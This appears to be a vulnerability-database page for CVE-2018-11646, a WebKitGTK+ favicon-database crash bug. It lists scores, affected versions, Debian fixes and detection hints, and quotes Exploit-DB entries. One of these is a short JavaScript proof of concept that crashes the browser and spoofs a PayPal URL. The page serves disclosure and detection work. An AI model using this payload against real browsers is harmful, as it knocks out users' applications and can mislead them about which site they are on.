CVE-2018-11646
published 2018-06-01CVE-2018-11646: webkitFaviconDatabaseSetIconForPageURL and webkitFaviconDatabaseSetIconURLForPageURL in UIProcess/API/glib/WebKitFaviconDatabase.cpp in WebKit, as used in…
PriorityP263high7.5CVSS 3.0
AVNACLPRNUINSUCNINAH
EXPLOIT
EPSS
69.02%
99.3th percentile
webkitFaviconDatabaseSetIconForPageURL and webkitFaviconDatabaseSetIconURLForPageURL in UIProcess/API/glib/WebKitFaviconDatabase.cpp in WebKit, as used in WebKitGTK+ through 2.21.3, mishandle an unset pageURL, leading to an application crash.
Affected
2 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| debian | webkit2gtk | < webkit2gtk 2.20.3-1 (bookworm) | webkit2gtk 2.20.3-1 (bookworm) |
| webkitgtk | webkitgtk | <= 2.21.3 | — |
Detection & IOCsextracted from sources · hover to see the quote
- →Crash is triggered by navigating a window to a new URL after stopping document load, causing webkitFaviconDatabaseSetIconForPageURL to be called with an unset pageURL. Monitor for rapid window.open() calls followed by execCommand('stop') and document.write() in the same script context. ↗
- →Crash backtrace originates at webkitFaviconDatabaseSetIconURLForPageURL (WebKitFaviconDatabase.cpp line 193) and webkitFaviconDatabaseSetIconForPageURL (line 318); process crash/SIGSEGV in a WebKitGTK+ process touching these functions is a strong indicator of exploitation. ↗
- →The Metasploit auxiliary module (EDB-44876) serves the exploit payload over HTTP; look for HTTP servers delivering JavaScript containing the window.open / execCommand('stop') / document.write pattern to WebKitGTK+ user-agents. ↗
- ·Vulnerability only affects WebKitGTK+ through version 2.21.3; fixed in Debian packages at version 2.20.3-1. Detections should be scoped to unpatched WebKitGTK+ deployments. ↗
- ·This is a DoS-only vulnerability (application crash); there is no known code-execution primitive. Scope detection efforts to availability impact rather than confidentiality/integrity. ↗
CVSS provenance
nvdv3.07.5HIGHCVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
nvdv2.05.0MEDIUMAV:N/AC:L/Au:N/C:N/I:N/A:P
osv7.5HIGH
vendor_debian7.5LOW
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-q2c8-4vmf-78h5: webkitFaviconDatabaseSetIconForPageURL and webkitFaviconDatabaseSetIconURLForPageURL in UIProcess/API/glib/WebKitFaviconDatabase
ghsa_unreviewed·2022-05-13
CVE-2018-11646 [HIGH] GHSA-q2c8-4vmf-78h5: webkitFaviconDatabaseSetIconForPageURL and webkitFaviconDatabaseSetIconURLForPageURL in UIProcess/API/glib/WebKitFaviconDatabase
webkitFaviconDatabaseSetIconForPageURL and webkitFaviconDatabaseSetIconURLForPageURL in UIProcess/API/glib/WebKitFaviconDatabase.cpp in WebKit, as used in WebKitGTK+ through 2.21.3, mishandle an unset pageURL, leading to an application crash.
OSV
CVE-2018-11646: webkitFaviconDatabaseSetIconForPageURL and webkitFaviconDatabaseSetIconURLForPageURL in UIProcess/API/glib/WebKitFaviconDatabase
osv·2018-06-01·CVSS 7.5
CVE-2018-11646 [HIGH] CVE-2018-11646: webkitFaviconDatabaseSetIconForPageURL and webkitFaviconDatabaseSetIconURLForPageURL in UIProcess/API/glib/WebKitFaviconDatabase
webkitFaviconDatabaseSetIconForPageURL and webkitFaviconDatabaseSetIconURLForPageURL in UIProcess/API/glib/WebKitFaviconDatabase.cpp in WebKit, as used in WebKitGTK+ through 2.21.3, mishandle an unset pageURL, leading to an application crash.
Debian
CVE-2018-11646: webkit2gtk - webkitFaviconDatabaseSetIconForPageURL and webkitFaviconDatabaseSetIconURLForPag...
vendor_debian·2018·CVSS 7.5
CVE-2018-11646 [HIGH] CVE-2018-11646: webkit2gtk - webkitFaviconDatabaseSetIconForPageURL and webkitFaviconDatabaseSetIconURLForPag...
webkitFaviconDatabaseSetIconForPageURL and webkitFaviconDatabaseSetIconURLForPageURL in UIProcess/API/glib/WebKitFaviconDatabase.cpp in WebKit, as used in WebKitGTK+ through 2.21.3, mishandle an unset pageURL, leading to an application crash.
Scope: local
bookworm: resolved (fixed in 2.20.3-1)
bullseye: resolved (fixed in 2.20.3-1)
forky: resolved (fixed in 2.20.3-1)
sid: resolved (fixed in 2.20.3-1)
trixie: resolved (fixed in 2.20.3-1)
No detection rules found.
Exploit-DB
WebKitGTK+ < 2.21.3 - 'WebKitFaviconDatabase' Denial of Service (Metasploit)
exploitdb·2018-06-11
CVE-2018-11646 WebKitGTK+ < 2.21.3 - 'WebKitFaviconDatabase' Denial of Service (Metasploit)
WebKitGTK+ "WebKitGTK+ WebKitFaviconDatabase DoS",
'Description' => %q(
This module exploits a vulnerability in WebKitFaviconDatabase when pageURL is unset.
If successful, it could lead to application crash, resulting in denial of service.
),
'License' => MSF_LICENSE,
'Author' => [
'Dhiraj Mishra', # Original discovery, disclosure
'Hardik Mehta', # Original discovery, disclosure
'Zubin Devnani', # Original discovery, disclosure
'Manuel Caballero' #JS Code
],
'References' => [
['EDB', '44842'],
['CVE', '2018-11646'],
['URL', 'https://bugs.webkit.org/show_bug.cgi?id=186164'],
['URL', 'https://datarift.blogspot.com/2018/06/cve-2018-11646-webkit.html']
],
'DisclosureDate' => 'Jun 03 2018',
'Actions' => [[ 'WebServer' ]],
'PassiveActions' => [ 'WebServer' ],
'DefaultAction' => 'WebServer'
)
)
e
Exploit-DB
WebKitGTK+ < 2.21.3 - Crash (PoC)
exploitdb·2018-06-05·CVSS 7.5
CVE-2018-11646 [HIGH] WebKitGTK+ < 2.21.3 - Crash (PoC)
WebKitGTK+
win = window.open("sleep_one_second.php", "WIN");
window.open("https://www.paypal.com", "WIN");
win.document.execCommand('Stop');
win.document.write("Spoofed URL");
win.document.close();
Backtrace using fedora 27:
#0 WTF::StringImpl::rawHash
at /usr/src/debug/webkitgtk4-2.18.0-2.fc27.x86_64/Source/WTF/wtf/text/StringImpl.h line 508
#1 WTF::StringImpl::hasHash
at /usr/src/debug/webkitgtk4-2.18.0-2.fc27.x86_64/Source/WTF/wtf/text/StringImpl.h line 514
#2 WTF::StringImpl::hash
at /usr/src/debug/webkitgtk4-2.18.0-2.fc27.x86_64/Source/WTF/wtf/text/StringImpl.h line 525
#3 WTF::StringHash::hash
at /usr/src/debug/webkitgtk4-2.18.0-2.fc27.x86_64/Source/WTF/wtf/text/StringHash.h line 73
#9 WTF::HashMap, WTF::HashTraits >::get
at /usr/src/debug/webkitgtk4-2.18.0-2.fc27.x86_64/Source/WT
Metasploit
WebKitGTK+ WebKitFaviconDatabase DoS
metasploit
WebKitGTK+ WebKitFaviconDatabase DoS
WebKitGTK+ WebKitFaviconDatabase DoS
This module exploits a vulnerability in WebKitFaviconDatabase when pageURL is unset. If successful, it could lead to application crash, resulting in denial of service.
No writeups or analysis indexed.
https://bugs.webkit.org/show_bug.cgi?id=186164https://bugzilla.gnome.org/show_bug.cgi?id=795740https://security.gentoo.org/glsa/201808-04https://www.exploit-db.com/exploits/44842/https://www.exploit-db.com/exploits/44876/https://bugs.webkit.org/show_bug.cgi?id=186164https://bugzilla.gnome.org/show_bug.cgi?id=795740https://security.gentoo.org/glsa/201808-04https://www.exploit-db.com/exploits/44842/https://www.exploit-db.com/exploits/44876/
2018-06-01
Published